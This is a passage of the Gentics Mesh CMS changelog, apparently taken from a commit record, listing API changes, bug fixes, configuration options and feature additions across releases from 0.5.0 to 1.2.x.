    "uuid" : "cd5ac8943a4448ee9ac8943a44a8ee25"
  },
…
}
----
____

icon:plus[] The parentNodeUuid property within node create requests was changed.

[quote, Example]
____
Old structure:
[source,json]
----
{
…
  "parentNodeUuid" : "cd5ac8943a4448ee9ac8943a44a8ee25",
…
}
----

New structure:
[source,json]
----
{
…
  "parentNode": {
    "uuid" : "cd5ac8943a4448ee9ac8943a44a8ee25"
  },
…
}
----
____

icon:plus[] JSON Schema information has been added to the RAML API documentation. This information can now be used to generate REST model types for various programming languages.

icon:plus[] The navigation response JSON was restructured. The root element was removed.

[quote, Example]
____
Old structure:
[source,json]
----
{
  "root" : {
    "uuid" : "cd5ac8943a4448ee9ac8943a44a8ee25",
    "node" : {…},
    "children" : […]
  }
}
----

New structure:
[source,json]
----
{
  "uuid" : "cd5ac8943a4448ee9ac8943a44a8ee25",
  "node" : {…},
  "children" : […]
}
----
____

== 0.7.0 (19.01.2017)

icon:bullhorn[] Content releases support

[quote]
____
This version of Gentics Mesh introduces _Content Releases_. A detailed description of this feature can be found in our https://getmesh.io/docs[Documentation].
____

icon:bullhorn[] Versioning support

[quote]
____
This version of Gentics Mesh introduces versioning of contents. A detailed description of the versioning feature can be found in our https://getmesh.io/docs[Documentation].

Important changes summary:

* Node update requests must now include the version information.
* The query parameter `?version=published` must be used to load published nodes (see the sketch below). Otherwise the node will not be found because the default version scope is __draft__.
* Two additional permissions for nodes have been added: __publish__, __readpublished__

Existing databases will automatically be migrated during the first setup.
____
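A sketch of the version scope parameter (`/api/v1` stands in for `{apiLatest}`; project name and uuid are placeholders):

[source,bash]
----
# Loads the draft version (the default scope)
curl localhost:8080/api/v1/demo/nodes/:nodeUuid

# Loads the published version of the node
curl "localhost:8080/api/v1/demo/nodes/:nodeUuid?version=published"
----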
icon:plus[] The missing *availableLanguages* and *defaultLanguage* parameters have been added to the *mesh-ui-config.js* file. Previously no language was configured which removed the option to translate contents.

icon:plus[] Image Property Support - The binary field will now automatically contain properties for the image *width*, the image *height* and the main *dominant color* of the image.

icon:plus[] API Version endpoint - It is now possible to load the mesh version information via a `GET` request to `{apiLatest}/`.

icon:plus[] Project endpoint - The current project information can now be loaded via a `GET` request to `{apiLatest}/:projectName`.

icon:check[] When the search indices were recreated with the reindex endpoint, the mapping for the raw fields was not added. This has been fixed now.

icon:check[] The search index mappings of fields of type "list" were incorrect and have been fixed now.

icon:check[] Various issues with the schema node migration process have been fixed.

== 0.6.29 (07.03.2017)

icon:plus[] The documentation has been enhanced.

icon:check[] Missing fields could cause error responses. The missing fields will now be set to null instead.

== 0.6.28 (21.10.2016)

icon:check[] Missing fields could cause error responses. The missing fields will now be set to null instead.

== 0.6.27 (07.10.2016)

icon:check[] Various issues with the schema node migration process have been fixed.

== 0.6.26 (05.10.2016)

icon:plus[] The maximum transformation depth limit was raised from 2 to 3.

== 0.6.25 (20.09.2016)

icon:plus[] The used Vert.x version was bumped to 3.3.3.

== 0.6.24 (19.09.2016)

icon:plus[] The Gentics Mesh admin ui has been updated. The UI will no longer send basic auth information for succeeding requests which were invoked after the login action had been invoked. Instead the basic auth login information will only be sent directly during login.

icon:check[] A bug within the breadcrumb resolver has been fixed. Previously breadcrumbs did not account for language fallback options and thus returned a 404 path for nodes which used a different language compared to the language of the retrieved node. This has been fixed.

== 0.6.23 (14.09.2016)

icon:check[] The missing availableLanguages and defaultLanguage parameters have been added to the mesh-ui-config.js file. Previously no language was configured which removed the option to translate contents.

== 0.6.22 (24.08.2016)

icon:plus[] It is now possible to publish language variants. Previously it was only possible to publish nodes, which affected all language variants of the node.
This affected all language variants of the node.\n\n== 0.6.21 (17.08.2016)\n\nicon:plus[] The debug output in case of errors has been enhanced.\n\n== 0.6.20 (03.08.2016)\n\nicon:check[] The changelog processing action for existing installations was fixed.\n\n== 0.6.19 (02.08.2016)\n\nicon:check[] Mesh-Admin-UI was updated to version 0.6.13\n\n== 0.6.18 (24.06.2016)\n\nicon:check[] Previously a search request which queried a lot of nodes could result in a StackOverflow exception. The cause for this exception was fixed.\n\nicon:plus[] The gentics\/mesh and gentics\/mesh-demo images now use the alpine flavour base image and thus the size of the image stack has been reduced.\n\nicon:plus[] The performance of the search endpoints has been improved.\n\n== 0.6.17 (22.06.2016)\n\nicon:check[] The path property within the node response breadcrumb was not set. The property will contain the resolved webroot path for the breadcrumb element. No value will be set if the resolveLinks query parameter was not configured or was set to OFF. CL-459\n\n== 0.6.16 (21.06.2016)\n\nicon:plus[] Gzip compression support was added. JSON responses are now pretty printed by default.\n\n== 0.6.15 (20.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.12\n\n== 0.6.13 (17.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.10\n\n== 0.6.12 (02.06.2016)\n\nicon:check[] A bug within the schema migration process was fixed. The label field was previously not correctly handled for newly added fields.\n\nicon:check[] A bug within the schema migration process was fixed. The segment field value was reset to null when updating a schema. This has been fixed now.\n\nicon:check[] The \"AllChangeProperties\" field was removed from the JSON response of schema fields.\n\n== 0.6.11 (31.05.2016)\n\nicon:check[] A bug which prevented node reference deletion was fixed. It is now possible to delete node references using a JSON null value in update requests.\n\nicon:plus[] OrientDB was updated to version 2.1.18\n\n== 0.6.10 (25.05.2016)\n\nicon:check[] It is now possible to grant and revoke permissions on microschemas using the `roles\/:uuid\/permissions` endpoint.\n\n== 0.6.9 (04.05.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] It is now possible to also include non-container nodes in a navigation response using the includeAll parameter. By default only container nodes will be included in the response.\n\nicon:check[] A minor issue within the webroot path handling of node references was fixed. CL-425\n\nicon:check[] Fixed label and allow field property handling when updating schema fields. CL-357\n\nicon:check[] Various concurrency issues have been addressed.\n\n== 0.6.8 (26.04.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] OrientDB was updated to version 2.1.16\n\n== 0.6.7 (25.04.2016)\n\nicon:check[] Update checker. A bug that prevented the update checker from working correctly was fixed.\n\n== 0.6.6 (06.04.2016)\n\nicon:bullhorn[] Public open beta release\n\nicon:check[] A bug within the reindex changelog entry was fixed. The bug prevented the node index from being recreated.\n\nicon:check[] The mesh-ui-config.js default apiUrl parameter was changed to {apiLatest} in order to allow access from hosts other than localhost.\n\n== 0.6.5 (05.04.2016)\n\nicon:check[] The displayField value was missing within the node search document. 
The value was added.\n\nicon:check[] The changelog execution information was added to the demo data dump and thus no further changelog execution will happen during mesh demo startup.\n\nicon:check[] An edge case that could cause multiple stack overflow exceptions was fixed.\n\nicon:plus[] A `Cache-Control: no-cache` header is now set on mesh responses.\n\nicon:plus[] The mesh-ui was updated.\n\nicon:check[] Various search index related bugs have been fixed.\n\nicon:plus[] The mesh-ui configuration file was renamed to mesh-ui.config.js\n\n== 0.6.4 (24.03.2016)\n\nicon:plus[] The mesh-ui was updated.\n\n== 0.6.3 (22.03.2016)\n\nicon:plus[] Database migration\/changelog system.\n A changelog system was added to mesh. The system is used to upgrade mesh data from one mesh version to another.\n\nicon:plus[] The *published* flag can now be referenced within an Elasticsearch query.\n\nicon:check[] It was not possible to update the *allow* flag for schema lists (e.g. micronode lists). This has been fixed now.\n\nicon:check[] The schema migration process did not update the node search index correctly.\n In some cases duplicate nodes would be returned (the old node and the migrated one).\n This has been fixed. Only the latest version of nodes will be returned now.\n\nicon:check[] An NPE was fixed which occurred when updating or creating a node list which included elements which could not be found. (CL-358)\n\nicon:check[] A typo within the search model document for users was fixed.\n The property `emailadress` was renamed to `emailaddress`.\n\n== 0.6.2 (15.03.2016)\n\nicon:check[] The microschema and schema permission field was always empty for newly created elements.\n\n== 0.6.1 (14.03.2016)\n\nicon:plus[] Added mesh-ui to gentics\/mesh docker image\n\n== 0.6.0 (14.03.2016)\n\nicon:plus[] Added image API endpoint\n Images can now be resized and cropped using the image endpoint.\n\nicon:plus[] Added schema versioning\n\nicon:plus[] Added schema migration process\n It is now possible to update schemas. Custom migration\n handlers can be defined in order to modify the node data.\n\nicon:plus[] Added Micronodes\/Microschemas\n A new field type has been added which allows creation of micronodes.\n\nicon:plus[] Webroot API\n The webroot REST endpoint was added which allows easy retrieval of nodes by their web path.\n\nicon:plus[] JWT Authentication support has been added\n It is now possible to select JWT in order to authenticate the user.\n\nicon:plus[] Navigation Endpoint\n The navigation REST endpoint was added which allows retrieval of navigation tree data which can be used to render navigations.\n\nicon:plus[] Added docker support\n It is now possible to start mesh using the gentics\/mesh or gentics\/mesh-demo docker image.\n\nicon:plus[] Vert.x update\n The Vert.x dependency was updated to version 3.2.1\n\nicon:check[] Fixed paging issue for nested tags\n\n== 0.5.0 (17.11.2015)\n\nicon:important[] Closed beta release\n","old_contents":"---\ntitle: Changelog\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n\/\/\/\/\n* Write changelog entries in present tense\n* Include GitHub issue or PR if possible using link:http:\/\/...[#123] format\n* Review your changelog entries\n* Don't include security sensitive information in the changelog\n* Include links to documentation if possible\n\/\/\/\/\n\n= Gentics Mesh Changelog\n\n[[expected]]\n== Planned Future Changes\n\n* With the release of `\/api\/v2` of the API, v1 has been deprecated. Version 2 introduced changes in the GraphQL API only. 
See the note in the changelog for link:#v0.35.0[v0.35.0] for details. The `\/api\/v1` endpoints still work as before; we will, however, cease support for `\/api\/v1` in the future. The Java REST client still uses v1 by default but can be set to v2. We advise switching while `\/api\/v1` is still supported to prevent failures in the future.\n\n* The `html` field type will be removed in the future. Instead the `string` type will be used in combination with an additional configuration property for this field in the schema. Of course, your existing schemas will be migrated for you.\n\n* The support for the embedded Elasticsearch will be dropped in the future. It is highly recommended to link:{{< relref \"elasticsearch.asciidoc\" >}}#_dedicated_elasticsearch[set up Elasticsearch as a dedicated service].\n\n* The Mesh Server will require Java 11 with the release of 2.0.0. The runtime support for Java 8 will be dropped. The Mesh Java REST client will still be usable with Java 8.\n\n[[Unreleased]]\n== Unreleased\n\nicon:plus[] Core: The number of deployed REST API verticles can now be link:{{< relref \"administration-guide.asciidoc\" >}}#_httpsssl[configured] and its default has been changed from 5 to 2 * CPU cores.\n\nicon:plus[] Core: It is now possible to use Gentics Mesh in read-only mode. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#readonly[documentation] for more information.\n\nicon:check[] REST: The `\/health\/live` and `\/health\/ready` endpoints have been added to the REST API. These endpoints are also available on the monitoring server, but adding them to the REST server makes it possible for load balancers to monitor the server on the same port that is used to proxy the requests.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.4`.\n\nicon:plus[] Core: The core plugin framework library was updated to version `2.1.0`.\n\n[[v1.2.1]]\n== 1.2.1 (22.11.2019)\n\nicon:check[] Core: Mesh now uses a different parser for processing `*.docx` and `*.pptx` files. Parsing these files will now require far less memory.\n\nicon:check[] GraphQL: Fixed fetching node references from users. link:https:\/\/github.com\/gentics\/mesh\/issues\/393[#393] link:https:\/\/github.com\/gentics\/mesh\/issues\/934[#934]\n\nicon:check[] Java Rest Client: Fixed a bug where some generic methods did not allow response objects of any class.\n\n[[v1.2.0]]\n== 1.2.0 (20.11.2019)\n\nWARNING: The internal database structure has changed significantly to avoid vertices with many edges. This will result in higher write performance on bigger systems. For this change, the API of Gentics Mesh did not change at all. When starting with this version on an existing database, the structure changes will be applied automatically, which will take some time to complete.\n\nCAUTION: If you are running Gentics Mesh in cluster mode, you need to link:{{< relref \"clustering.asciidoc\" >}}#_setup[initialize the cluster again]. You must use the `-initCluster` command line argument or set the `MESH_CLUSTER_INIT` environment variable to `true` on one of the master instances of the cluster.\n\nicon:check[] Java Rest Client: Generic methods (`get`, `post`, `put`, `delete`) now allow response objects of any class.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#110---2019-11-20[1.1.0].\n\n[[v1.1.1]]\n== 1.1.1 (11.11.2019)\n\nicon:plus[] GraphQL: The GraphQL Endpoint now supports the `wait` query-parameter like the Search Endpoint does. 
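link:https:\/\/github.com\/gentics\/mesh\/issues\/805[#805]\n\nA minimal, hypothetical sketch of the parameter usage; the host, the `demo` project name and the query itself are illustrative assumptions:\n\n[source,bash]\n----\n# Wait for Elasticsearch to be in sync before the query is executed\ncurl -X POST \"http:\/\/localhost:8080\/api\/v2\/demo\/graphql?wait=true\" -H \"Content-Type: application\/json\" -d '{\"query\":\"{ nodes { elements { uuid } } }\"}'\n----\n\n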
icon:plus[] Clustering: The role of an instance has been added to the link:https:\/\/getmesh.io\/docs\/api\/#admin_cluster_status_get[cluster status response].\n\nicon:check[] Core: Some optimizations to binary uploads have been made.\n\nicon:check[] Core: Fixed an issue that sometimes caused errors when performing write requests during a schema migration.\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#102---2019-11-11[1.0.2].\n\n[[v1.1.0]]\n== 1.1.0 (29.10.2019)\n\nWARNING: The internal monitoring library has been changed from dropwizard to link:https:\/\/micrometer.io\/[micrometer]. This allows better labeling of various metrics for link:https:\/\/prometheus.io\/[Prometheus]. With this change, some metrics names from Vert.x have been changed. See link:https:\/\/vertx.io\/docs\/vertx-micrometer-metrics\/java\/#_vert_x_core_tools_metrics[here] for the new list of Vert.x metrics. By default, JVM metrics are also recorded. This can be configured in the link:{{< relref \"administration-guide.asciidoc\" >}}#_monitoring_options[monitoring options]. Also, the response structure in the `\/search\/status` endpoint has changed. Take a look at the link:https:\/\/getmesh.io\/docs\/api\/#search_status_get[API docs] for a new example.\n\nicon:plus[] Search: A new setting has been added which can be used to enable Elasticsearch 7 support. The `search.complianceMode` setting in the `mesh.yml` file can be used to control the compliance mode for Elasticsearch support. The setting can also be controlled via the `MESH_ELASTICSEARCH_COMPLIANCE_MODE` environment variable. Currently there are two modes: `ES_7` for Elasticsearch 7.x and `ES_6` for Elasticsearch 6.x.\nBy default `ES_6` will be used, thus no changes are required for existing installations.\n\nicon:plus[] Core: A new endpoint for administration has been added. The `\/admin\/debuginfo` endpoint lets you gather various information about the system. Take a look at the link:{{< relref \"administration-guide.asciidoc\" >}}#debuginfo[administration guide] for details.\n\nicon:plus[] Monitoring: New metrics for caching statistics have been added. Take a look at the link:{{< relref \"monitoring.asciidoc\" >}}#metrics[documentation] for the new metrics.\n\nicon:check[] OrientDB: The included OrientDB version has been updated to version 3.0.24\n\nicon:check[] Core: Some extensive logging messages will now only be logged on a finer log level. These include error messages for GraphQL queries, on closed client connections and requests sent to Elasticsearch.\n\n[[v1.0.2]]\n== 1.0.2 (11.10.2019)\n\nicon:check[] Core: The internal memory usage has been reduced.\n\n[[v1.0.1]]\n== 1.0.1 (08.10.2019)\n\nicon:check[] UI: The UI has been updated to version link:https:\/\/github.com\/gentics\/mesh-ui\/blob\/develop\/CHANGELOG.md#101---2019-10-08[1.0.1]\n\nicon:plus[] Core: Link resolving now supports branches. Take a look at the link:{{< relref \"features.asciidoc\" >}}#linkresolvingbranches[documentation] for more information. link:https:\/\/github.com\/gentics\/mesh-incubator\/issues\/38[#38]\n\n[[v1.0.0]]\n== 1.0.0 (03.10.2019)\n\nicon:bullhorn[] New UI\n\n[quote]\n____\n\nThis version of Gentics Mesh contains a new UI which is accessible via `\/mesh-ui`. 
The old UI is still part of this release and can be accessed via `\/mesh-ui-v1`.\n\nThe following noteworthy aspects of the UI have been updated \/ altered:\n\n* The permission management has been reworked\n* A new schema editor which features autocompletion has been added\n* The usability of the edit view has been enhanced\n* The editor for HTML fields has been replaced\n* A new image editor has been added which now supports focal point handling\n* Language handling has been improved\n* The UI no longer depends on Elasticsearch\n____\n\nicon:bullhorn[] New defaults\n\n[quote]\n____\n\nFor new server installations (`mesh-server`) the Elasticsearch embedded server will no longer be enabled by default. The demo server (`mesh-demo`) will still start the embedded Elasticsearch server for ease of use.\nIt is still possible to enable the embedded server via the `search.startEmbedded: true` and `search.url: http:\/\/localhost:9200` settings in the `mesh.yml` file.\n____\n\nicon:check[] Search: Synchronizing the search index when starting after Gentics Mesh has not been stopped properly will not block the startup routine anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/862[#862]\n\nicon:check[] Core: Path resolving performance has been increased.\n\n[[v0.41.0]]\n== 0.41.0 (01.10.2019)\n\nicon:plus[] REST: The ETag generation was reworked. This means that previously generated ETags are no longer valid.\n\nicon:check[] REST: Fixed ETag generation when `fields` or `rolePerms` was used. Previously these parameters did not affect the ETag. link:https:\/\/github.com\/gentics\/mesh\/issues\/881[#881]\n\nCAUTION: Reworked OAuth2 \/ OIDC support\n\n[quote]\n____\n\nThe `security.oauth2` configuration section was removed. Instead the `security.publicKeysPath` property was added.\n\nIn order to provide support for more authentication providers it is now possible to specify the path to a file which contains the public keys in the configuration. These keys will be used to validate the access tokens.\n\nYou can read more about how to set up OAuth2 \/ OIDC in the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2_oidc[OAuth2 \/ OIDC] guide.\n\nIt is now also possible for Authentication Service Plugins to provide JSON Web Keys (JWK) to Gentics Mesh. Plugins can load the accepted JWKs from the authentication provider server and return them to Gentics Mesh. A plugin has to implement the `getPublicKeys()` method to support this.\n\nPlugins can now implement the `extractUsername()` method to return the username that should be used to handle mappings between Mesh and JWT.\n\nPlease note that installations which already use an authentication plugin can either update the plugin and provide the public keys or manually add the public key to the `public-keys.json` configuration file.\n____\n\n[[v0.40.3]]\n== 0.40.3 (13.09.2019)\n\nicon:plus[] Java Rest Client: Various new methods have been added to handle endpoint-agnostic requests (`get(), post(), delete(), put()`). These methods can be used to handle plugin requests.\n\nicon:check[] Migration: It is now possible to apply schema \/ microschema changes that include the `name` property via the `changes` endpoint. 
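Previously the name property was not utilized.\n\nAs a rough, hypothetical sketch only (the operation name and payload shape are assumptions; consult the API documentation for the authoritative model), a rename submitted to the `changes` endpoint could look roughly like this:\n\n[source,json]\n----\n{\n  \"changes\": [\n    {\n      \"operation\": \"UPDATESCHEMA\",\n      \"properties\": {\n        \"name\": \"renamedSchema\"\n      }\n    }\n  ]\n}\n----\n\n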
[[v0.40.2]]\n== 0.40.2 (09.09.2019)\n\nicon:plus[] Core: It is now possible to configure the transaction retry limit using the `MESH_GRAPH_TX_RETRY_LIMIT` environment variable or the `storage.txRetryLimit` parameter.\n\nicon:check[] Core: The default value for `storage.synchronizeWrites` has been changed to `true`.\n\nicon:check[] Core: The default value for the OrientDB parameter `tx.retry.delay` has been increased to 10ms, and the constant delay will be used instead of growing linearly. It is now possible to configure the delay via the `MESH_GRAPH_TX_RETRY_DELAY` environment variable.\n\nicon:check[] Config: It is now possible to override the mapping mode with the `MESH_ELASTICSEARCH_MAPPING_MODE` environment variable. link:https:\/\/github.com\/gentics\/mesh\/issues\/878[#878]\n\n[[v0.40.1]]\n== 0.40.1 (06.09.2019)\n\nCAUTION: REST: When updating permissions on an element, unset permissions in the request will not change these permissions anymore. Previously, unset permissions were set to false.\n\nicon:check[] Core: Various handlers were blocking the event loop when run. This has been fixed now.\n\nicon:check[] Core: Fixed delayed initialization of `VersionPurgeJobImpl` vertices. Previously the type was not set up during startup and this resulted in a warning when the type was first used.\n\nicon:plus[] Java Rest Client: The `createSchema()` methods now accept a `ParameterProvider` vararg parameter.\n\nicon:check[] Core: Schema validation will no longer fail by default when Elasticsearch is not available. The previous behavior can be enforced by adding `?strictValidation=true`.\n\nicon:check[] GraphQL: Fixed a bug that prevented loading of permissions of an element.\n\nicon:plus[] GraphQL: Added the `rolePerms` field to mesh elements. This allows you to load permissions of a role, similar to the link:{{< relref \"features.asciidoc\" >}}#_querying_permissions[`?role` query parameter in REST].\n\n[[v0.40.0]]\n== 0.40.0 (27.08.2019)\n\nicon:bullhorn[] Image Manipulation: The new resizing options `smart`, `prop` and `force` have been added.\n\n[quote]\n____\n\n**force**\n\nThe `?resize=force` mode will resize the image to the specified dimensions. This can lead to a distorted image when the aspect ratio of the source image does not match the destination aspect ratio.\n\n**smart**\n\nWhen using `?resize=smart` the resizer will automatically crop the image to the desired dimensions instead of distorting it when providing `width` _and_ `height` parameters which would result in an aspect ratio that is different from the original image's aspect ratio.\n\nThe new default image resize mode is `smart`, which potentially crops an image when the requested aspect ratio diverges from the source image's aspect ratio. The old behaviour can now be achieved by using the `?resize=force` parameter.\n\n**prop**\n\nThe `?resize=prop` mode will resize the image proportionally so that the resulting destination format fits inside the provided dimensions (`width`, `height`). No distortion of the image will occur.\n\nFor details on image manipulation and resizing options read the link:{{< relref \"image-manipulation.asciidoc\" >}}[Image Manipulation documentation].\n\nThis change might not automatically apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be manually cleared.\n\n____\n\nicon:plus[] Search: A new search option `search.mappingMode` has been added. 
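The mapping mode setting influences how mappings for fields will be generated. By default the mode `DYNAMIC` is used. In this mode mappings are generated as before. When using the mode `STRICT` only mappings for fields which have a custom mapping via the `elasticsearch` schema parameter will be created. This is useful if you want to have finer control over what contents should be added to Elasticsearch.\n\nA minimal `mesh.yml` sketch of the setting; the `url` value is illustrative and the rest of the search section is assumed to keep its defaults:\n\n[source,yaml]\n----\nsearch:\n  url: \"http:\/\/localhost:9200\"\n  # Only fields with a custom mapping via the elasticsearch schema parameter are indexed\n  mappingMode: \"STRICT\"\n----\n\nAlternatively the mode can be set via the `MESH_ELASTICSEARCH_MAPPING_MODE` environment variable (see the 0.40.2 entry above).\n\n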
icon:plus[] Graph: The default value for `tx.retry.delay` has been set to 0. The tx delay will thus be disabled by default.\n\nicon:plus[] Clustering: The `storage.synchronizeWrites` option will be enabled by default when clustering is active.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.23\n\n[[v0.39.2]]\n== 0.39.2 (20.08.2019)\n\nicon:check[] A regression in `v0.38.0` caused migration errors for nodes which contained not yet populated fields. This issue has now been fixed. Failed migrations can be re-run by deleting the failed job via `DELETE \/api\/v2\/admin\/jobs\/{jobUuid}` and triggering `POST \/api\/v2\/{project}\/branches\/{branchUuid}\/migrateSchemas` to create a new migration job. link:https:\/\/github.com\/gentics\/mesh\/issues\/847[#847]\n\nicon:plus[] Graph: It is now possible to configure the OrientDB transaction delay by adding the `tx.retry.delay` parameter to the `storage.parameters` field.\n\n[[v0.39.1]]\n== 0.39.1 (14.08.2019)\n\nicon:check[] A regression in `v0.39.0` broke the `\/demo` endpoint. This has been fixed now and the demo application is accessible again.\n\n[[v0.39.0]]\n== 0.39.0 (13.08.2019)\n\nicon:plus[] Core: The core has been reworked to add future support for multitenancy in Gentics Mesh.\n\n[[v0.38.1]]\n== 0.38.1 (12.08.2019)\n\nicon:check[] Plugins: A bug in the plugin startup process has been fixed. Previously plugins were not initialized prior to registration.\n\nicon:check[] GraphQL: The `pluginApi` field will no longer be added to the schema if no GraphQL plugins have been deployed to avoid schema validation errors. link:https:\/\/github.com\/gentics\/mesh\/issues\/842[#842]\n\nicon:plus[] Changelog: The `ReleaseBranchRenameChange` entry has been updated to reduce required memory and increase execution performance on large databases (2m+ nodes).\n\nicon:plus[] REST: An `X-Powered-By` header was added to all HTTP responses.\n\n[[v0.38.0]]\n== 0.38.0 (09.08.2019)\n\nCAUTION: Removal of mapper script support\n\n[quote]\n____\n\nThe mapper script support has been dropped due to the deprecation of the Nashorn JavaScript engine. 
The functionality of mapper scripts can be replaced by usage of the new link:{{< relref \"plugin-types\/auth-service-plugin.asciidoc\" >}}[Authentication Service Plugin API].\n\nThe `auth.mapperScriptDevMode` and `auth.mapperScriptPath` configuration options are no longer needed and have been removed.\n____\n\nicon:check[] Plugins: The query type of plugins will now automatically be prefixed with the plugin apiName to ensure that no type conflicts can occur.\n\n[[v0.37.1]]\n== 0.37.1 (06.08.2019)\n\nicon:plus[] Core: The core Dagger library was updated from version `2.11` to `2.24`.\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\n[[v0.37.0]]\n== 0.37.0 (05.08.2019)\n\nicon:bullhorn[] New Plugin System\n\n[quote]\n____\n\nThe Plugin System has been overhauled.\n\n*REST API changes*\n\nPreviously plugins were assigned a UUID and could thus be managed using this UUID:\n\n* `DELETE \/admin\/plugins\/{uuid}`\n\nThe new plugin system will now utilize the plugin id for the REST and GraphQL APIs instead. The pluginId is unique to each plugin and is a better, easier-to-grasp identifier for a plugin.\n\n*New Java API \/ Structure*\n\nThe plugin API and structure have been overhauled and existing plugins need to be migrated (link:{{< relref \"plugin-migration.asciidoc\" >}}[Migration Guide]) to the new API in order to be deployable.\n\n*GraphQL Plugin support*\n\nIt is now possible to create plugins which extend the GraphQL API. Plugins which provide link:{{< relref \"plugin-development.asciidoc\" >}}#_graphql_plugin[GraphQL extensions] will be made accessible under the `pluginApi` GraphQL field.\n\n*Dropped maven repository support*\n\nIt is no longer possible to load plugins directly via Maven coordinates. The REST API will only accept filesystem paths to plugins.\n\n*Classloader fix*\n\nThe classloader mechanism has been altered. Plugins can now provide their own library versions. Previously a class which was also present in Gentics Mesh Server was loaded from the server class loader instead of the plugin. 
This has been fixed now.\n\n*Examples \/ Guide*\n\nThe plugin development process documentation has been enhanced.\n\n* link:{{< relref \"plugin-development\" >}}[Plugin Development]\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples[Plugin Examples]\n* link:{{< relref \"guides\/mesh-library-plugin\" >}}[Example Plugin Guide]\n\n____\n\nicon:check[] Core: Fixed a bug that caused an error when changing a field in a schema to a binary field.\n\nicon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.8.0`.\n\n[[v0.36.8]]\n== 0.36.8 (02.08.2019)\n\nicon:check[] Core: Fixed a bug that caused node contents to not be found when migrating from an old version of Gentics Mesh (0.22.x) to the current version.\n\n[[v0.36.7]]\n== 0.36.7 (23.07.2019)\n\nicon:check[] Backup: Fixed a bug in the backup handler which prevented the backup process from switching back to the correct status after a backup failed due to filesystem errors.\n\nicon:plus[] Java Rest Client: Added `#equals` and `#hashCode` implementations to REST models.\n\nicon:plus[] Graph: It is now possible to configure the OrientDB `RID_BAG_EMBEDDED_TO_SBTREEBONSAI_THRESHOLD` setting by adding the `ridBag.embeddedToSbtreeBonsaiThreshold` parameter to the `storage.parameters` field.\n\nicon:plus[] REST: An error will now be returned when sending the `newPassword` field in the login request when the `forcedPasswordChange` flag has not been set.\n\nicon:plus[] REST: The webroot responses will now contain the header `Webroot-Node-Uuid` which identifies the node of the loaded content.\n\nicon:plus[] REST: The authentication and element loading performance has been greatly increased.\n\n[[v0.36.6]]\n== 0.36.6 (16.07.2019)\n\nicon:plus[] REST: The performance of path resolving has been improved.\n\nicon:plus[] Core: A new configuration section has been added. The `cache` options in the `mesh.yml` can now be used to control cache settings. The `cache.pathCacheSize` config setting and `MESH_CACHE_PATH_SIZE` environment variable can be used to control the path cache which will improve webroot and GraphQL path resolving performance.\n\nicon:plus[] REST: The `webroot` endpoint will now set the `Cache-Control` header to `public` if the requested node can be read using the anonymous role. Otherwise the header will be set to `private`. This information is useful if you want to use a caching proxy between Gentics Mesh and your front-end application.\n\nicon:check[] Core: Performance of loading nodes has been improved.\n\nicon:check[] Core: Request logging now uses the link:https:\/\/vertx.io\/docs\/apidocs\/io\/vertx\/ext\/web\/handler\/LoggerFormat.html#SHORT[short format], which also shows how much time the response took to complete.\n\nicon:check[] Core: Improved performance when loading images with image manipulation.\n\n[[v0.36.5]]\n== 0.36.5 (10.07.2019)\n\nicon:plus[] Upload: The `upload.parser` config setting and `MESH_BINARY_DOCUMENT_PARSER` environment variable can be used to control whether uploads should be parsed to extract metadata and contents. Uploads will be parsed by default.\n\nicon:plus[] Search: The `search.includeBinaryFields` config setting and `MESH_ELASTICSEARCH_INCLUDE_BINARY_FIELDS` environment variable can be used to control whether binary field metadata and plain text content should be added to the search index. 
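By default metadata and content will be added to the search index.\n\nA minimal `mesh.yml` sketch combining both settings; the values shown are illustrative, not recommendations:\n\n[source,yaml]\n----\nupload:\n  # Disable metadata \/ content extraction for uploads entirely\n  parser: false\nsearch:\n  # Keep extracted binary field data out of the search index\n  includeBinaryFields: false\n----\n\nThe same behaviour can be controlled via the `MESH_BINARY_DOCUMENT_PARSER` and `MESH_ELASTICSEARCH_INCLUDE_BINARY_FIELDS` environment variables.\n\n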
icon:plus[] REST: A core library for JSON support (jackson) has been updated.\n\nicon:plus[] GraphQL: The performance when loading nodes via the schema field has been improved.\n\nicon:plus[] Core: Various internal calls have been improved to increase read performance.\n\nicon:check[] Search: Fixed the root cause of an unnecessary full sync which could occur during schema migrations.\n\n[[v0.36.4]]\n== 0.36.4 (05.07.2019)\n\nicon:check[] GraphQL: Fixed a bug that caused an error when filtering a node from a schema context that has no content in the default language.\n\nicon:plus[] Graph: The `storage.synchronizeWrites` config setting and `MESH_GRAPH_SYNC_WRITES` environment variable can be used to control whether write operations should be executed synchronously. By default write operations are handled asynchronously.\n\nicon:check[] Core: Performance of schema migration has been improved.\n\n[[v0.36.3]]\n== 0.36.3 (04.07.2019)\n\nicon:plus[] Search: Two new options have been added to the mesh search configuration. When the encoded request length exceeds the new `bulkLengthLimit`, no new documents will be added to the bulk and the bulk will be sent to Elasticsearch. The new `retryLimit` causes Gentics Mesh to drop a request to Elasticsearch after the configured limit has been reached. link:https:\/\/github.com\/gentics\/mesh\/issues\/784[#784]\n\nicon:check[] Search: Backpressure for handling index requests has been improved. This reduces memory usage when indexing large amounts of data in a short period of time. link:https:\/\/github.com\/gentics\/mesh\/issues\/785[#785]\n\nicon:check[] Search: Some default configuration values have been changed. `timeout`: `8000` -> `60000`, `bulkLimit`: `2000` -> `100`. These changes will not be applied to existing configurations.\n\nicon:check[] REST: Various branch-specific internal checks have been updated to fix potential error cases. 